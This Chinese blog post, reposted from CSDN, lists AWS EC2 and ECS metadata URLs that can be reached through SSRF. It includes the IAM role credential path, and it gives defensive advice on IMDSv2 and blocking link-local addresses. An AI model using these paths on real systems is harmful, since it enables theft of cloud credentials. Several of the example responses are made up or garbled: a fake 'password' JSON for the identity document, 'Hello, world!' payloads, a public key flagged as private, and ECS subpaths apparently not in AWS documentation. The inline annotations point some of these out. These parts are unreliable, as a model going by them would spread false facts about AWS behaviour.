【Web】云安全之SSRF可利用的敏感API列表

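以下是一些比较敏感的 AWS 元数据服务 API 列表(持续更新)。这些地址只能从实例或容器内部访问,因此存在 SSRF 的应用可能把其中的信息泄露给外部请求方。防护上应强制使用 IMDSv2(需先用 PUT 请求换取会话令牌并在请求头中携带)、限制元数据响应的跳数,并在应用层校验出站请求的目标地址,拒绝 169.254.0.0/16 等链路本地地址: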

  1. 获取 EC2 实例的 IAM 角色凭证:

    http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>
    
    其中 `<role-name>` 是要获取 IAM 角色凭证的角色名称。
    不带角色名的路径则返回该实例所绑定的角色名称:
    http://169.254.169.254/latest/meta-data/iam/security-credentials/
    
    返回 JSON 举例(对应带 `<role-name>` 的请求;返回的是临时凭证,到 Expiration 所示时间失效)
    {
      "Code" : "Success",
      "LastUpdated" : "2020-01-01T00:00:00Z",
      "Type" : "AWS-HMAC",
      "AccessKeyId" : "AKIAIOSFODNN7EXAMPLE",
      "SecretAccessKey" : "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
      "Token" : "AQoEXAMPLEH4aoAH0gNCAPyJxz4BlCFFxWNE1OPTgk5TthT+FvwqnKwRcOIfrRh3c/LTo6UDdyJwOOvEVPvL1v8pSX7mJH60zdBDF5W0qlainiVob9t8C1o+Uk/VItyBabExample",
      "Expiration" : "2020-01-01T01:00:00Z"
    }
  2. 获取 EC2 实例的密码数据:

    http://169.254.169.254/latest/meta-data/instance-identity/document
    
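    返回json举例(注意:据 AWS 文档,该路径返回的是实例身份文档,字段为 accountId、region、instanceId、imageId 等,并不包含密码;下面的 JSON 与实际返回结构不符,仅为原文示意)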
    {
      "metaData": {  
        "self": {  
          "href": "https://ec2.amazonaws.com/"  
        },  
        "Password": "password"  
      }  
    }
    
  3. 获取 EC2 实例的 SSH 公钥:

    http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
    返回json示例(注意:据 AWS 文档,该路径以纯文本返回 OpenSSH 格式的公钥,只含公钥、不含私钥;下面的 JSON 仅为原文示意,其中 raw 字段在原文中已是乱码)
    {
      "message": "Hello, world!",  
      "data": {  
        "url": "http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key",  
        "key": {  
          "algorithm": "openssh",  
          "size": 2048,  
          "public": true,  
          "private": true,  
          "raw": "d 壹 l4@N+|-sbnW1Ew=="  
        }  
      }  
    }
    
    
  4. 获取 ECS 容器实例的任务定义:

    http://169.254.170.2/v2/metadata/<container-id>/task-definition
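    返回 JSON 示例(注意:AWS 文档中任务元数据端点 v2 的路径为 /v2/metadata 与 /v2/metadata/<container-id>,此处的 task-definition 子路径和下面的 JSON 结构未见于官方文档,请以官方文档为准)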
    {
      "message": "Hello, world!",    
      "data": {    
        "taskDefinition": {    
          "type": "AWS::EC2::TaskDefinition",    
          "Properties": {    
            "Description": "Test Task Definition",    
            "ImageId": "ami-12345678",    
            "Name": "test-task-definition",    
            "Tags": [    
              {    
                "Key": "Environment",    
                "Value": "Test"    
              }    
            ]    
          }    
        },    
        "url": "http://169.254.170.2/v2/metadata/container-id/task-definition"    
      }    
    }
    
    

    其中 <container-id> 是要获取任务定义的容器 ID。

  5. 获取 ECS 容器实例的任务元数据:

    http://169.254.170.2/v2/metadata/<container-id>/task-with-metadata
    返回 JSON 示例(注意:此处的 task-with-metadata 子路径和下面的 JSON 结构未见于 AWS 官方文档,请以官方文档为准)
    {
      "message": "Hello, world!",      
      "data": {      
        "taskWithMetadata": {      
          "type": "AWS::EC2::TaskWithMetadata",      
          "Properties": {      
            "ImageId": "ami-12345678",      
            "Name": "test-task-with-metadata",      
            "TaskDefinition": {      
              "type": "AWS::EC2::TaskDefinition",      
              "Properties": {      
                "Description": "Test Task Definition",      
                "ImageId": "ami-12345678",      
                "Name": "test-task-definition",      
                "Tags": [      
                  {      
                    "Key": "Environment",      
                    "Value": "Test"      
                  }      
                ]      
              }      
            },      
            "Tags": [      
              {      
                "Key": "Environment",      
                "Value": "Test"      
              }      
            ]      
          }      
        },      
        "url": "http://169.254.170.2/v2/metadata/container-id/task-with-metadata"      
      }      
    }
    

    其中 <container-id> 是要获取任务元数据的容器 ID。


转载自blog.csdn.net/xiru9972/article/details/131058088